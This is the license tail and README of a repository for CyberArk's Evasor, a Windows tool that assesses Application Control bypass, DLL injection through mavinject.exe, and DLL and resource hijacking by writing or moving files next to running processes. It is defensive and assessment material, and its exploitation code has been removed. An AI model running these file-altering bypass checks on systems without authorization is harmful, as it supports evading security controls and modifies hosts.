In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright (c) 2020 CyberArk Software Ltd. All rights reserved. 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Overview 2 | 3 | Evasor is an automated security assessment tool that locates existing executables on the Windows operating system which can be used to bypass Application Control rules. 4 | It is easy to use, quick and fully automated, and generates a report including descriptions, screenshots and mitigation suggestions; it suits both blue and red teams assessing a post-exploitation phase. 5 | 6 | ## Requirements 7 | 8 | * Windows OS. 9 | * Visual Studio 2017 installed. 10 | 11 | ## Usage instructions 12 | 13 | Download the Evasor project and compile it. 14 | Make sure the App.config file is excluded from the project's reference tree. 15 | 16 | 17 | 18 | Run Evasor.exe from the bin folder. 19 | Choose your numeric option from the following: 20 | 21 | 22 | 23 | 1. Locating executable files that can be used to bypass Application Control! 
24 | * Retrieving the relative paths of all running processes 25 | * Checking whether each process (executable file) is vulnerable to DLL injection by: 26 | 1. Running the Microsoft "MavInject" component from C:\Windows\System32\mavinject.exe with default parameters. 27 | 2. Checking the exit code of the MavInject execution; if the process exited normally, the process is treated as vulnerable to DLL injection and usable to bypass Application Control. 28 | 2. Locating processes that are vulnerable to DLL hijacking! 29 | * Retrieving all running processes 30 | * For each running process: 31 | 1. Retrieving the loaded process modules 32 | 2. Checking whether the process's working directory is writable, by creating an empty file with the name of a loaded module (DLL) or by overwriting an existing module file in that directory. Note that this is a real write test, not a permission query: it creates or overwrites files next to a running process, so run it only on systems where such changes are authorized and can be reverted. 33 | 3. If the write operation succeeds, the process is likely vulnerable to DLL hijacking. 34 | 3. Locating potentially hijackable resource files 35 | * Searching the computer for files by their extension. 36 | * Trying to move those files to another location in order to validate that they can be replaced and are therefore potentially vulnerable to resource hijacking. Like the previous check, this modifies files on the host rather than only reading their permissions. 37 | * Extensions: xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,msi,yaml,lib,inf,reg,log,htm,hta,sys,rsp 38 | 4. Generating an automatic assessment report (Word document) that includes a description of the tests and the screenshots taken. 39 | 40 | ## Contributing 41 | 42 | We welcome contributions of all kinds to this repository. For instructions on how to get started and descriptions 43 | of our development workflows, please see our [contributing guide](https://github.com/cyberark/conjur-api-go/blob/master/CONTRIBUTING.md). 44 | 45 | ## License 46 | 47 | This repository is licensed under Apache License 2.0 - see [`LICENSE`](LICENSE) for more details. 
48 | 49 | ## Share Your Thoughts And Feedback 50 | 51 | For more comments, suggestions or questions, you can contact Arik Kublanov from CyberArk Labs. Copyright © 2020 CyberArk Software Ltd. All rights reserved. You can find more projects developed by us at https://github.com/cyberark/. 52 | 53 | 54 | # Notes 55 | * The original code, developed and used internally at CyberArk Labs (Copyright © 2020 CyberArk Software Ltd. All rights reserved.), fully automates the exploitation of the informational results. 56 | * The original code contains activation and exploitation parts, which have been removed from this public release. 57 | * The files under the DLLs folder are empty and contain no exploitation code; they are provided for the cyber-security community (red and blue teams) to implement according to their own needs, and can serve as a starting point for their assessment objectives. 58 | -------------------------------------------------------------------------------- /devenv_vTcX5EfWI2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cyberark/Evasor/8628bcd143a1955a4d8c721850e7b85e2462ebe9/devenv_vTcX5EfWI2.png --------------------------------------------------------------------------------